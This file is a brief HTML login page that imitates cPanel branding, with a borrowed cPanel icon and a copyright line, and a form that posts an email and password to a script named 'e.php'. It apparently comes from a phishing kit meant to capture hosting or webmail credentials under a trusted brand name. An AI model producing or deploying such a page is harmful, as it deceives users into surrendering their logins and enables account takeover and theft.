<html><center><link href="https://www.buycpanel.com/wp-content/uploads/2016/12/cPanel-logo.png" rel="shortcut icon"><br><br><br>
<form action="e.php" method="post">
  <div class="imgcontainer">
    <img src="WEB.jpg" alt="Logo" height="420" width="580"><br><br><br><br>
  </div>

  <div class="container">
    <label><b>Username</b></label>
    <input type="text" placeholder="Enter Email" name="user" required><p>

    <label><b>Password</b></label>
    <input type="password" placeholder="Enter Password" name="password" required> <p>

    <button type="submit">Login</button>
    <input type="checkbox" checked="checked"> Remember me
  </div>
  </div>
</form>
<br><br><br><br><br><br><br><br><br>
Copyright&copy; 2020 cPanel, Inc.

</center>
</html>